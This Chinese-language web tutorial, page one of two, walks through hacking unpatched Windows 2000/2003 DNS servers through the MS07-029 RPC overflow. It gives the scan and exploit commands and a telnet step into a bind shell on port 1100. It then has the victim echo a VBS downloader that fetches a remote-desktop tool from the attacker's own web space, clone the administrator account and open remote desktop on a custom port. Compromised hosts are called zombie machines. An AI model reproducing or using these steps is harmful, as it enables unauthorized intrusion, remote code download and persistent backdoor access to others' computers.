黑客体验：MS07-029漏洞利用入侵过程

• 　　前言：　　MS07-029，Windows 域名系统 (DNS) 服务器服务的远程过程调用 (RPC) 管理接口中存在基于堆栈的缓冲区溢出。漏洞的前提是没打补丁，开启DNS服务的所有版本windows 2000 Server和WINDOWS 2003 Server。

  　　今天，就让我带领各路英豪，踏上DNS EXP之路。

  　　我们先来看看所用工具的界面：

  

  　　这就是传说中的利用工具，可以通杀2000SEVER，2003SEVER系统，另外还具备了扫描功能!

  　　先用它来对主机进行扫描：

  　　在我们的命令行下输入：“dns –s 目标IP地址”

  

  　　稍等片刻，开放的端口以及操作系统以出现在我们面前，如果出现了如上图所显示的“1029:Vulnerability”那么恭喜你，你马上就会成功得到这台主机的权限了

  　　上图意思就是1029端口存在漏洞。

  　　现在我们来最关键的步骤――溢出：

  　　在命令行内输入

  　　dns -2003chs *.*.93.189 1029

  　　其中-2003ch的意思是操作系统的型号，-2003chs即简体中文版的2003系统，

  　　如果是2000的系统就使用“-2000all”参数，*.*.93.189就是我们的目标IP地址，1029就是刚才扫描出存在漏洞的端口”。

  

  　　出现“Attack sent ,check port 1100”字样，说明已经打开了目标地址的1100端口，我们TELNET上去：TELNET *.*.93.189 1100

  

  　　我们现在已经成功的入侵了对方的电脑，并且得到了管理员的权限。

  　　下面我给大家介绍一下如何在肉鸡上面开3389，

  　　在命令行里输入

  　　@echo with wscript:if .arguments.count^ tony.vbs

  　　@echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >> tony.vbs

  　　@echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then .echo "Error:"+web.status:.quit >> tony.vbs

  　　@echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >> tony.vbs

  　　大概的意思就是在命令行创立一个用来下载的VBS脚本tony.vbs

  　　然后把开3389的工具上传到你的个人空间,

  　　我这里用的是火狐开3389的工具，在命令行里输入 cscript tony.vbs http://你空间地址/wrsky.exe c:\wrsky.exe

  

  　　“wrsky.exe -c”可以克隆当前管理员帐号

  　　再输入“c:\wrsky.exe -o 3551”

  

  　　意思就是打开对方的远程桌面服务，并且使用3551端口。

  　　用“wrsky.exe -k”可以检查3389是否开启，开启以后输入“wrsky.exe -r”,对方的电脑就自动重启以后就可以连接上去了。

  
  

• [1] [2] 下一页 
• 复制本页网址和标题，发送给你QQ/Msn的好友一起分享
  
  
• 黑客体验：MS07-029漏洞利用入侵过程 相关文章：
• ·黑客体验：MS07-029漏洞利用入侵过程
• 黑客体验：MS07-029漏洞利用入侵过程 相关软件

上一篇:Photoshop处理唯美梦幻抽线特效

下一篇:黑客体验：MS07-029漏洞利用入侵过程

• 特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作
• 者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转
• 载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源：http://www.hackhome.com

精品推荐

热点TOP10

特别推荐